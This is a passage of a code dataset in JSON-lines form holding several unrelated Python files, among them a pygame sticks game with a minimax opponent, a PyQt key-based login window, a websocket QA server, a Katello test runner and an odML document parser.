You should go now.'\n self.label_report.place(x=100, y=120)\n\n else:\n self.label_report.place(x=130, y=120)\n report = '\\nLab conditions are not good.\\n'\n if not is_normal_noise:\n report += 'It is too noisy,'\n else:\n report += 'It is not noisy, but'\n if not is_normal_temp:\n report += ' temperature is extreme.'\n else:\n report += ' but temperature is fine.'\n\n if not is_forecast:\n report += '\\nCheck our conditions Forecast.'\n\n return report\n\n\n","sub_path":"lab_recommend.py","file_name":"lab_recommend.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"267317676","text":"import sys\n\ndef findLabOrder(Path):\n textData = open(Path,'r')\n lineData = textData.readlines() #lineData is each line in txt file\n lineOrder = []\n for line in lineData:\n posFind = line.find('Found order:')\n if posFind != -1:\n newLine = line[posFind+13:-5]\n newLine = newLine.rstrip('\\n')\n lineOrder.append(newLine)\n RemoveDupList(lineOrder)\n return lineData, lineOrder\n\ndef RemoveDupList(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\n\n\n\n\n\n \n \n ","sub_path":"model/ReadLogs.py","file_name":"ReadLogs.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"93808951","text":"# Cubes\nimport matplotlib.pyplot as plt\n\nx_val = range(1,5001)\ny_val = [x**3 for x in x_val]\n\nplt.scatter(x_val, y_val,\n s=20,\n c='red',\n edgecolor='none')\n\nplt.xlabel('Root',fontsize=10)\nplt.ylabel('Cubes',fontsize=10)\nplt.title('Cubes of 1-5000')\nplt.tick_params(axis='both',which='major')\n\nplt.savefig('ex15-11.png', bbox_inches='tight')\nplt.show()\n","sub_path":"data_visualization/ex15-1.py","file_name":"ex15-1.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"1255143","text":"import pygame\nimport random\nimport sys\nfrom sys import maxsize\n\nclass Node(object):\n def __init__(self, i_depth, i_playerNum, i_sticksRemaining, i_value = 0):\n self.i_depth = i_depth\n self.i_playerNum = i_playerNum\n self.i_sticksRemaining = i_sticksRemaining\n self.i_value = i_value\n self.children = []\n self.CreateChildren()\n\n def CreateChildren(self):\n if self.i_depth >= 0:\n for i in range(1, 3):\n v = self.i_sticksRemaining - i\n self.children.append( Node( self.i_depth - 1,-self.i_playerNum, v, self.RealVal(v)))\n \n \n def RealVal(self, value):\n if (value == 0):\n return maxsize * self.i_playerNum\n elif (value < 0):\n return maxsize * -self.i_playerNum\n return 0\n\ndef MinMax(node, i_depth, i_playerNum):\n if(i_depth == 0) or (abs(node.i_value) == maxsize):\n return node.i_value\n i_bestValue = maxsize * -i_playerNum\n\n for i in range(len(node.children)):\n child = node.children[i]\n i_val = MinMax(child, i_depth -1, -i_playerNum)\n if (abs(maxsize * i_playerNum - i_val) < abs(maxsize * i_playerNum - i_bestValue)):\n i_bestValue = i_val\n return i_bestValue\n\ndef WinCheck(i_sticks, i_playerNum):\n if i_sticks <= 0:\n print(\"*\"*30)\n if i_playerNum > 0:\n if i_sticks == 0:\n endscreen(0)\n else:\n if i_sticks == 0:\n endscreen(1)\n print(\"*\"*30)\n return 0\n return 1\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, (255,255,255))\n return textSurface, textSurface.get_rect()\n\ndef linspace(a, b, n=100):\n if n < 2:\n return b\n diff = 
(float(b) - a)/(n - 1)\n return [diff * i + a for i in range(n)]\n\ndef intro():\n\tlbx = 200\n\twidth = 150\n\theight = 75\n\trbx = scw - lbx - width\n\tbby = sch - height - 20\n\trun = True\n\twhile run:\n\t\tclock.tick(30)\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tif (lbx + width) > mouse[0] > lbx and (bby + height) > mouse[1] > bby:\n\t\t\t\t\tif event.button == 1:\n\t\t\t\t\t\trun = False\n\t\t\t\telif (rbx + width) > mouse[0] > rbx and (bby + height) > mouse[1] > bby:\n\t\t\t\t\tsys.exit()\n\n\t\t\twin.blit(startscreen, (0, 0))\n\t\t\tmouse = pygame.mouse.get_pos()\n\n\t\t\tif (lbx + width) > mouse[0] > lbx and (bby + height) > mouse[1] > bby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_GREEN), (lbx, bby, width, height))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (GREEN), (lbx, bby, width, height))\n\n\t\t\tif (rbx + width) > mouse[0] > rbx and (bby + height) > mouse[1] > bby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_RED), (rbx, bby, width, height))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (RED), (rbx, bby, width, height))\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",35)\n\t\t\ttextSurf, textRect = text_objects(\"Играть!\", smallText)\n\t\t\ttextRect.center = (lbx + width/2, bby + height/2)\n\t\t\twin.blit(textSurf, textRect)\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",35)\n\t\t\ttextSurf, textRect = text_objects(\"Выйти\", smallText)\n\t\t\ttextRect.center = (rbx + width/2, bby + height/2)\n\t\t\twin.blit(textSurf, textRect)\n\t\t\tpygame.display.update()\n\ndef endscreen(w):\n\tlbx = 200\n\twidth = 150\n\theight = 75\n\trbx = scw - lbx - width\n\tbby = sch - height - 20\n\trun = True\n\twin.blit(fade, (0,0))\n\twhile run:\n\t\tclock.tick(30)\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tif (lbx + width) > mouse[0] > lbx and (bby + height) > mouse[1] > bby:\n\t\t\t\t\tif event.button == 1:\n\t\t\t\t\t\tgame()\n\t\t\t\telif (rbx + width) > mouse[0] > rbx and (bby + height) > mouse[1] > bby:\n\t\t\t\t\tsys.exit()\n\t\t\t\n\t\t\tmouse = pygame.mouse.get_pos()\n\n\t\t\tif (lbx + width) > mouse[0] > lbx and (bby + height) > mouse[1] > bby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_GREEN), (lbx, bby, width, height))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (GREEN), (lbx, bby, width, height))\n\n\t\t\tif (rbx + width) > mouse[0] > rbx and (bby + height) > mouse[1] > bby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_RED), (rbx, bby, width, height))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (RED), (rbx, bby, width, height))\n\n\t\t\tif w == 0:\n\t\t\t\twin.blit(humanwon, (307, 50))\n\t\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",30)\n\t\t\t\ttextSurf, textRect = text_objects(\"Eще раз!\", smallText)\n\t\t\t\ttextRect.center = (lbx + width/2, bby + height/2)\n\t\t\t\twin.blit(textSurf, textRect)\n\t\t\telse:\n\t\t\t\twin.blit(compwon, (307, 50))\n\t\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",35)\n\t\t\t\ttextSurf, textRect = text_objects(\"Реванш!\", smallText)\n\t\t\t\ttextRect.center = (lbx + width/2, bby + height/2)\n\t\t\t\twin.blit(textSurf, textRect)\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",35)\n\t\t\ttextSurf, textRect = text_objects(\"Выйти\", smallText)\n\t\t\ttextRect.center = (rbx + width/2, bby + height/2)\n\t\t\twin.blit(textSurf, textRect)\n\t\t\tpygame.display.update()\n\ndef game():\n\ti_stickTotal = 
16\n\ti_depth = 10\n\ti_curPlayer = 1\n\twidth = 63\n\theight = 215\n\tsbh = 70\n\tsbw = 140\n\tsbx = scw/2-sbw/2\n\tsby = sch-sbh*11/10\n\tsc = 0\n\tx = linspace(width/2, scw - width*3/2, i_stickTotal)\n\ty = []\n\tp = []\n\tfor i in range(i_stickTotal):\n\t\ty.append(150)\n\t\tp.append(1)\n\n\trun = True\n\twhile run:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tfor i in range(len(x)):\n\t\t\t\t\tif (x[i] + width) > event.pos[0] > x[i] and (y[i] + height) > event.pos[1] > y[i]:\n\t\t\t\t\t\tif event.button == 1:\n\t\t\t\t\t\t\tif sc < 2:\n\t\t\t\t\t\t\t\tif p[i] == 1:\n\t\t\t\t\t\t\t\t\ty[i] += 50 * p[i]\n\t\t\t\t\t\t\t\t\tp[i] *= -1\n\t\t\t\t\t\t\t\t\tsc += 1\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\ty[i] += 50 * p[i]\n\t\t\t\t\t\t\t\t\tp[i] *= -1\n\t\t\t\t\t\t\t\t\tsc -= 1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif p[i] == -1:\n\t\t\t\t\t\t\t\t\ty[i] += 50 * p[i]\n\t\t\t\t\t\t\t\t\tp[i] *= -1\n\t\t\t\t\t\t\t\t\tsc -= 1\n\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN and sc != 0:\n\t\t\t\tif (sbx + sbw) > event.pos[0] > sbx and (sby + sbh) > event.pos[1] > sby:\n\t\t\t\t\tif event.button == 1:\n\t\t\t\t\t\tfor k in range(len(p)):\n\t\t\t\t\t\t\tif p[k] == -1:\n\t\t\t\t\t\t\t\tspeed = 4\n\t\t\t\t\t\t\t\twhile y[k] < 600:\n\t\t\t\t\t\t\t\t\tclock.tick(60)\n\t\t\t\t\t\t\t\t\twin.blit(bg, (0, 0))\n\t\t\t\t\t\t\t\t\tfor i in range(len(x)):\n\t\t\t\t\t\t\t\t\t\twin.blit(stick, (x[i], y[i], width, height))\n\t\t\t\t\t\t\t\t\ty[k] += speed\n\t\t\t\t\t\t\t\t\tspeed *= 12/10\n\t\t\t\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\t\ti_stickTotal -= sc\n\t\t\t\t\t\tWinCheck(i_stickTotal, i_curPlayer)\n\t\t\t\t\t\tsc = 0\n\t\t\t\t\t\tam = []\n\t\t\t\t\t\tfor i in range(len(x)):\n\t\t\t\t\t\t\tif y[i] == 150:\n\t\t\t\t\t\t\t\tam.append(i)\n\t\t\t\t\t\ti_curPlayer *= -1\n\t\t\t\t\t\tnode = Node(i_depth, i_curPlayer, i_stickTotal)\n\t\t\t\t\t\tbestChoice = -100\n\t\t\t\t\t\ti_bestValue = -i_curPlayer * maxsize\n\t\t\t\t\t\tfor i in range(len(node.children)):\n\t\t\t\t\t\t\tn_child = node.children[i]\n\t\t\t\t\t\t\ti_val = MinMax(n_child, i_depth, -i_curPlayer)\n\t\t\t\t\t\t\t# keep the child whose value is closest to a win for the current player (mirrors MinMax)\n\t\t\t\t\t\t\tif (abs(i_curPlayer * maxsize - i_val) < abs(i_curPlayer * maxsize - i_bestValue)):\n\t\t\t\t\t\t\t\ti_bestValue = i_val\n\t\t\t\t\t\t\t\tbestChoice = i\n\t\t\t\t\t\tbestChoice += 1\n\t\t\t\t\t\tc_choice = bestChoice\n\t\t\t\t\t\twhile c_choice > 0:\n\t\t\t\t\t\t\tcc = random.choice(am)\n\t\t\t\t\t\t\tspeed = 4\n\t\t\t\t\t\t\twhile y[cc] > -100 - height:\n\t\t\t\t\t\t\t\tclock.tick(60)\n\t\t\t\t\t\t\t\twin.blit(bg, (0, 0))\n\t\t\t\t\t\t\t\tfor i in range(len(x)):\n\t\t\t\t\t\t\t\t\twin.blit(stick, (x[i], y[i], width, height))\n\t\t\t\t\t\t\t\ty[cc] -= speed\n\t\t\t\t\t\t\t\tspeed *= 12/10\n\t\t\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\t\t\tc_choice -= 1\n\t\t\t\t\t\t\tam.remove(cc)\n\t\t\t\t\t\ti_stickTotal -= bestChoice\n\t\t\t\t\t\tWinCheck(i_stickTotal, i_curPlayer)\n\t\t\t\t\t\ti_curPlayer *= -1\n\n\t\t\tmouse = pygame.mouse.get_pos()\n\t\t\twin.blit(bg, (0, 0))\n\t\t\tfor i in range(len(x)):\n\t\t\t\tif (x[i] + width) > mouse[0] > x[i] and (y[i] + height) > mouse[1] > y[i]:\n\t\t\t\t\tif sc < 2:\n\t\t\t\t\t\twin.blit(stick, (x[i]-5, y[i]-5, width+75, height+75))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif y[i] == 200:\n\t\t\t\t\t\t\twin.blit(stick, (x[i]-5, y[i]-5, width+75, height+75))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\twin.blit(stick, (x[i], y[i], width, height))\n\t\t\t\telse:\n\t\t\t\t\twin.blit(stick, (x[i], y[i], width, height))\n\n\t\t\tif (sbx + 
sbw) > mouse[0] > sbx and (sby + sbh) > mouse[1] > sby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_GREEN), (sbx, sby, sbw, sbh))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (GREEN), (sbx, sby, sbw, sbh))\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",30)\n\t\t\ttextSurf, textRect = text_objects(\"Палочек осталось - \" + str(i_stickTotal), smallText)\n\t\t\ttextRect.center = (1000,50)\n\t\t\t#win.blit(textSurf, textRect)\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",40)\n\t\t\ttextSurf, textRect = text_objects(\"Взять\", smallText)\n\t\t\ttextRect.center = ((sbx+(sbw/2)),sby+(sbh/2))\n\t\t\twin.blit(textSurf, textRect)\n\t\t\tpygame.display.update()\n\npygame.init()\nscw = 1138\nsch = 520\nwin = pygame.display.set_mode((scw, sch))\nclock = pygame.time.Clock()\npygame.display.set_caption(\"Sticks Game\")\nstick = pygame.image.load('res/stick.png')\nbg = pygame.image.load('res/background.png')\nstartscreen = pygame.image.load('res/startscreen.png')\ncompwon = pygame.image.load('res/compwon.png')\nhumanwon = pygame.image.load('res/humanwon.png')\nfade = pygame.Surface((scw, sch))\nfade.fill((0,0,0))\nfade.set_alpha(150)\nLIGHT_GREEN = (20, 255, 42)\nGREEN = (20, 200, 40)\nLIGHT_RED = (255, 10, 10)\nRED = (200, 20, 20)\n\nintro()\ngame()\npygame.quit()\n","sub_path":"sticks.py","file_name":"sticks.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"478521327","text":"if REQUEST is None:\n REQUEST = context.REQUEST\nif response is None:\n response = REQUEST.RESPONSE\n\nweb_section = context\n\nif REQUEST.getHeader('If-Modified-Since', '') == web_section.getModificationDate().rfc822():\n response.setStatus(304)\n return \"\"\n\nresponse.setHeader('Content-Type', 'text/cache-manifest')\nresponse.setHeader('Cache-Control', 'max-age=0, public, must-revalidate')\n\nreturn \"\"\"CACHE MANIFEST\n# %s + hash\"\"\" % context.getLayoutProperty(\"configuration_latest_version\", default=\"development\")\n","sub_path":"bt5/erp5_officejs_appstore_base/SkinTemplateItem/portal_skins/erp5_officejs_appstore_base/WebSection_renderOfficeJSRedirectAppCache.py","file_name":"WebSection_renderOfficeJSRedirectAppCache.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"484034129","text":"# -*- coding: cp1251 -*-\n__author__ = 'whoami'\n__version__ = \"1.2.4\"\n\n\"\"\"\nОкно входа или регистрации.\n\"\"\"\n\nimport sys\nfrom re import match\nfrom threading import Thread\nfrom PyQt4 import QtGui, QtCore\nfrom os import path, getcwd\nfrom key_gen import encode_md5, rsa_gen_key, rsa_load_key\nfrom .message_box import message_box\nfrom config_read import read_cfg\n\n\nclass RegWnd(QtGui.QWidget):\n def __init__(self, db, app, parent=None):\n \"\"\"\n\n :param db: instance db.DataBase\n :param app: QtGui.QApplication\n :param parent:\n :return:\n \"\"\"\n super().__init__(parent)\n self.db = db\n self.pubkey = None\n self.privkey = None\n self.pubkey_in_md5 = None\n self.username = None\n self.app = app\n self.res = read_cfg(\"resources.ini\", \"welcome\")\n self.icon_wnd = QtGui.QIcon(self.res[\"icon\"])\n\n self.setWindowTitle(self.res[\"title\"])\n self.setWindowIcon(self.icon_wnd)\n self.setFixedSize(250, 200)\n\n self.label = QtGui.QLabel(self.res[\"msg_welcome\"])\n self.label.setObjectName(\"welcome\")\n self.label.setWordWrap(True)\n\n self.edit = QtGui.QLineEdit()\n 
self.edit.setPlaceholderText(self.res[\"edit_holder_text\"])\n\n self.btn_ok = QtGui.QPushButton(self.res[\"btn_ok\"])\n\n self.btn_cancel = QtGui.QPushButton(self.res[\"btn_cancel\"])\n\n self.box_label = QtGui.QHBoxLayout()\n self.box_label.addWidget(self.label)\n\n self.box_edit = QtGui.QHBoxLayout()\n self.box_edit.addWidget(self.edit)\n\n self.box_buttons = QtGui.QHBoxLayout()\n self.box_buttons.addWidget(self.btn_ok)\n self.box_buttons.addWidget(self.btn_cancel)\n\n self.vbox = QtGui.QVBoxLayout()\n self.vbox.addLayout(self.box_label)\n self.vbox.addLayout(self.box_edit)\n self.vbox.addLayout(self.box_buttons)\n\n self.setLayout(self.vbox)\n self.set_signals()\n self.set_animation()\n self.show()\n\n def set_animation(self):\n self.animation = QtCore.QStateMachine()\n\n state_start = QtCore.QState()\n state_end = QtCore.QState()\n\n state_start.assignProperty(self.label, \"geometry\",\n QtCore.QRect(20, -29, 200, 200))\n state_end.assignProperty(self.label, \"geometry\",\n QtCore.QRect(21, -29, 200, 200))\n\n state_start.addTransition(self.btn_ok,\n QtCore.SIGNAL(\"clicked()\"), state_end)\n state_end.addTransition(self.btn_ok,\n QtCore.SIGNAL(\"clicked()\"), state_start)\n\n label_anim = QtCore.QPropertyAnimation(self.label, \"geometry\")\n label_anim.setEasingCurve(QtCore.QEasingCurve.InOutElastic)\n label_anim.setDuration(700)\n\n self.animation.addState(state_start)\n self.animation.addState(state_end)\n self.animation.setInitialState(state_start)\n self.animation.addDefaultAnimation(label_anim)\n self.animation.start()\n\n def set_signals(self):\n self.btn_ok.clicked.connect(self.btn_ok_click)\n self.btn_cancel.clicked.connect(self.btn_cancel_click)\n self.connect(self.edit, QtCore.SIGNAL(\"returnPressed()\"),\n self.btn_ok.click)\n\n def sign_up(self, username):\n\n def confirm(login):\n return message_box(\n self.res[\"confirm_text\"].format(login),\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.Question,\n self.res[\"confirm_title\"],\n self.icon_wnd\n )\n\n pattern = r\"[0-9A-Za-z]{4,}\"\n result = match(pattern, username)\n if not result or len(result.group()) != len(username):\n return False\n\n if self.db.check_user(username) and confirm(username):\n result = [None]\n t1 = Thread(target=self.get_keys, args=(result,))\n t1.start()\n self.label.setText(self.res[\"msg_gen_start\"])\n # wait thread\n self.setEnabled(False)\n while t1.isAlive():\n self.app.processEvents()\n self.setEnabled(True)\n\n if result[0]:\n return self.db.insert_users(\n [self.pubkey_in_md5, username]\n )\n else:\n return False\n else:\n return False\n\n def sign_in(self, dir):\n if self.get_keys(dir=dir):\n return self.db.sign_in(self.pubkey_in_md5)\n else:\n return None\n\n def get_keys(self, result=None, dir=None):\n self.pubkey = None\n self.privkey = None\n self.pubkey_in_md5 = None\n self.username = None\n\n if dir:\n self.pubkey, self.privkey = rsa_load_key(dir=dir)\n else:\n self.pubkey, self.privkey = rsa_gen_key()\n\n if self.pubkey and self.privkey:\n self.pubkey_in_md5 = encode_md5(self.pubkey.save_pkcs1())\n if result: result[0] = True\n return True\n else:\n if result: result[0] = False\n return False\n\n def btn_ok_click(self):\n username = self.edit.text()\n if not username:\n username = getcwd()\n if path.exists(username):\n self.username = self.sign_in(username)\n if not self.username:\n self.label.setText(self.res[\"msg_wrong_key\"])\n else:\n self.close()\n else:\n if not self.sign_up(username):\n self.label.setText(self.res[\"msg_gen_end\"])\n else:\n 
self.username = username\n self.close()\n\n def btn_cancel_click(self):\n self.close()\n\n\ndef register(db, style=None):\n app = QtGui.QApplication([])\n app.setStyle(\"Plastique\")\n app.setStyleSheet(style)\n\n wnd = RegWnd(db, app)\n\n app.exec_()\n\n return wnd.pubkey, wnd.privkey, wnd.username","sub_path":"build/2.2.5/gui/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"5968624","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# vim: ts=4 sw=4 expandtab ai\n\nimport glob\nimport os\nimport subprocess\nimport sys\n\nfrom optparse import OptionParser\n\n# Borrowed from https://github.com/pulp/pulp/blob/master/run-tests.py\n# Find and eradicate any existing .pyc files, so they do not eradicate us!\nPROJECT_DIR = os.path.abspath(os.path.curdir)\n\nsubprocess.call(['find', PROJECT_DIR, '-name', '*.pyc', '-delete'])\n\nTESTS = [\n 'test_ActivationKeys',\n 'test_ContentViews',\n 'test_ContentViewDefinitions',\n 'test_Environments',\n 'test_Organizations',\n 'test_Providers',\n 'test_SystemGroups',\n 'test_Systems',\n 'test_Users',\n ]\n\nparser = OptionParser()\n\nparser.add_option('-s', '--host', type=str, dest='host', help='Server url')\nparser.add_option('-u', '--username', type=str, dest='username', default='admin', help='Valid system username')\nparser.add_option('-p', '--password', type=str, dest='password', default='admin', help='Valid system user password')\nparser.add_option('--project', type=str, dest='project', default='/katello', help='Project can be either \"katello\" or \"headpin\"')\nparser.add_option('--port', type=str, dest='port', default='443', help='Server port, defaults to 443')\nparser.add_option('--verbose', type='choice', choices=['1', '2', '3', '4', '5'], default=1, help='Debug verbosity level')\nparser.add_option('--katello-src', type=str, dest='src', default='/usr/lib/python2.6/site-packages/katello/client/api', help='Location for Katello\\'s source code.')\n\n(options, ignored_options) = parser.parse_args()\n\nos.environ['KATELLO_HOST'] = options.host\nos.environ['KATELLO_USERNAME'] = options.username\nos.environ['KATELLO_PASSWORD'] = options.password\nos.environ['PROJECT'] = options.project\nos.environ['KATELLO_PORT'] = options.port\nos.environ['VERBOSITY'] = str(options.verbose)\n\nPACKAGES = [x.split('/')[-1][:-3] for x in glob.glob(\"%s/*.py\" % options.src) if 'init' not in x]\n\nenv = os.environ.copy()\n\nparams = [\n 'nosetests',\n '--verbose',\n '--with-xunit',\n '--with-coverage',\n '--cover-html',\n '--cover-erase',\n '--cover-package',\n \",\".join([\"katello.client.api.%s\" % x for x in PACKAGES]),\n \"--tests\",\n \",\".join([\"tests.%s\" % x for x in TESTS]),\n ]\n\nsubprocess.call(params, env=env)\n","sub_path":"run-tests.py","file_name":"run-tests.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"150277994","text":"import threading\nimport logging\nfrom websocket_server import WebsocketServer\n\"\"\" WebSocket service \nRuns on a separate thread, supports multiple clients\n\"\"\"\nclass QAService:\n def __init__(self, q):\n self.name = \"\"\n self._q = q\n self._answer = \"\"\n\n def _run_thread(self):\n # Initializes WebSocket for specific IP and PORT number\n server = WebsocketServer(13254, host='0.0.0.0')\n # assigns new_client callback function\n server.set_fn_new_client(self.new_client)\n\n # assigns 
callback for receving messages from clients\n server.set_fn_message_received(self.message_recieved)\n\n # starts main loop of WebSocket server\n server.run_forever()\n\n def new_client(self, client, server):\n # server.send_message_to_all(\"Hey all, a new client has joined us\")\n print(\"new client has joined\")\n\n def message_recieved(self, client, server, message):\n print(\"=======================================================================================================\")\n print(\"NEW REQUEST FROM CLIENT: {}\".format(client))\n print(\"DATA: {}\".format(message))\n print(\"NUMBER OF TEXT TOKENS: {}\".format(len(message.split())))\n # answer = self.predict_answer(message)\n evt = threading.Event()\n self._q.put((message, evt))\n\n # waits for processing thread to process the message\n evt.wait()\n\n # sends a message to client with processed result\n print(\"Sending message back {}\".format(self._answer))\n server.send_message(client, self._answer)\n\n def set_answer(self, answer):\n # called by message processing thread to set the result\n self._answer = answer\n\n def start_web_server(self):\n # starts separate thread for running WebSocket server\n th = threading.Thread(target=self._run_thread)\n th.start()\n","sub_path":"qa_service.py","file_name":"qa_service.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"272987186","text":"n,m = map(int , input().split())\r\n\r\ne = []\r\n\r\nfor i in range(m):\r\n a,b,c = map(int , input().split())\r\n e.append((a-1,b-1,c)) \r\n\r\nmaxdis = [-float('inf') for i in range(n)]\r\n\r\nmaxdis[0] = 0\r\nmugen = False\r\n\r\nfor i in range(n):\r\n for j in e:\r\n st,gl,cost = j\r\n if (maxdis[gl] < maxdis[st]+cost):\r\n maxdis[gl] = maxdis[st]+cost\r\n if (i >= n-1 and (gl == n-1)): \r\n mugen = True \r\n break\r\nif mugen:\r\n print(\"inf\")\r\n\r\nelse:\r\n print(maxdis[n-1])","sub_path":"Source Codes/AtCoder/abc061/D/4496253.py","file_name":"4496253.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"201163207","text":"#!/usr/bin/env python\n\"\"\"\nA generic odML parsing module.\n\nParses odML files and documents.\n\"\"\"\n\nimport datetime\nimport json\nimport sys\nimport yaml\n\nfrom os.path import basename\n\nfrom . 
import xmlparser\nfrom .dict_parser import DictWriter, DictReader\nfrom ..info import FORMAT_VERSION\nfrom .parser_utils import ParserException\nfrom .parser_utils import SUPPORTED_PARSERS\nfrom .rdf_converter import RDFReader, RDFWriter\nfrom ..validation import Validation\n\ntry:\n unicode = unicode\nexcept NameError:\n unicode = str\n\n\nclass ODMLWriter:\n \"\"\"\n A generic odML document writer, for XML, YAML and JSON.\n\n Usage:\n xml_writer = ODMLWriter(parser='XML')\n xml_writer.write_file(odml_document, filepath)\n \"\"\"\n\n def __init__(self, parser='XML'):\n self.parsed_doc = None # Python dictionary object equivalent\n parser = parser.upper()\n\n if parser not in SUPPORTED_PARSERS:\n raise NotImplementedError(\"'%s' odML parser does not exist!\" % parser)\n\n self.parser = parser\n\n def write_file(self, odml_document, filename):\n # Write document only if it does not contain validation errors.\n validation = Validation(odml_document)\n msg = \"\"\n for err in validation.errors:\n if err.is_error:\n msg += \"\\n\\t- %s %s: %s\" % (err.obj, err.rank, err.msg)\n if msg != \"\":\n msg = \"Resolve document validation errors before saving %s\" % msg\n raise ParserException(msg)\n\n with open(filename, 'w') as file:\n # Add XML header to support odML stylesheets.\n if self.parser == 'XML':\n file.write(xmlparser.XMLWriter.header)\n\n file.write(self.to_string(odml_document))\n\n def to_string(self, odml_document):\n string_doc = ''\n\n if self.parser == 'XML':\n string_doc = unicode(xmlparser.XMLWriter(odml_document))\n elif self.parser == \"RDF\":\n # Use turtle as default output format for now.\n string_doc = RDFWriter(odml_document).get_rdf_str(\"xml\")\n else:\n self.parsed_doc = DictWriter().to_dict(odml_document)\n\n odml_output = {'Document': self.parsed_doc,\n 'odml-version': FORMAT_VERSION}\n\n if self.parser == 'YAML':\n yaml.add_representer(datetime.time, YAMLTimeSerializer)\n string_doc = yaml.dump(odml_output, default_flow_style=False)\n elif self.parser == 'JSON':\n string_doc = json.dumps(odml_output, indent=4,\n cls=JSONDateTimeSerializer)\n\n if sys.version_info.major < 3:\n string_doc = string_doc.encode(\"utf-8\")\n\n return string_doc\n\n\n# Required to serialize datetime.time as string objects\ndef YAMLTimeSerializer(dumper, data):\n return dumper.represent_scalar('tag:yaml.org,2002:str', str(data))\n\n\n# Required to serialize datetime values with JSON.\nclass JSONDateTimeSerializer(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, (datetime.datetime, datetime.date, datetime.time)):\n return str(o)\n\n return json.JSONEncoder.default(self, o)\n\n\nclass ODMLReader:\n \"\"\"\n A reader to parse odML files or strings into odml documents,\n based on the given data exchange format, like XML, YAML, JSON or RDF.\n\n Usage:\n yaml_odml_doc = ODMLReader(parser='YAML').from_file(\"odml_doc.yaml\")\n json_odml_doc = ODMLReader(parser='JSON').from_file(\"odml_doc.json\")\n \"\"\"\n\n def __init__(self, parser='XML', show_warnings=True):\n \"\"\"\n :param parser: odml parser; supported are 'XML', 'JSON', 'YAML' and 'RDF'.\n :param show_warnings: Toggle whether to print warnings to the command line.\n \"\"\"\n self.doc = None # odML document\n self.parsed_doc = None # Python dictionary object equivalent\n parser = parser.upper()\n if parser not in SUPPORTED_PARSERS:\n raise NotImplementedError(\"'%s' odML parser does not exist!\" % parser)\n self.parser = parser\n self.show_warnings = show_warnings\n self.warnings = []\n\n def from_file(self, file, 
doc_format=None):\n\n if self.parser == 'XML':\n par = xmlparser.XMLReader(ignore_errors=True,\n show_warnings=self.show_warnings)\n self.warnings = par.warnings\n self.doc = par.from_file(file)\n return self.doc\n\n elif self.parser == 'YAML':\n with open(file) as yaml_data:\n try:\n yaml.SafeLoader.add_constructor(\n \"tag:yaml.org,2002:python/unicode\",\n UnicodeLoaderConstructor)\n self.parsed_doc = yaml.safe_load(yaml_data)\n except yaml.parser.ParserError as err:\n print(err)\n return\n\n par = DictReader(show_warnings=self.show_warnings)\n self.doc = par.to_odml(self.parsed_doc)\n # Provide original file name via the in memory document\n self.doc._origin_file_name = basename(file)\n return self.doc\n\n elif self.parser == 'JSON':\n with open(file) as json_data:\n try:\n self.parsed_doc = json.load(json_data)\n except ValueError as err: # Python 2 does not support JSONDecodeError\n print(\"JSON Decoder Error: 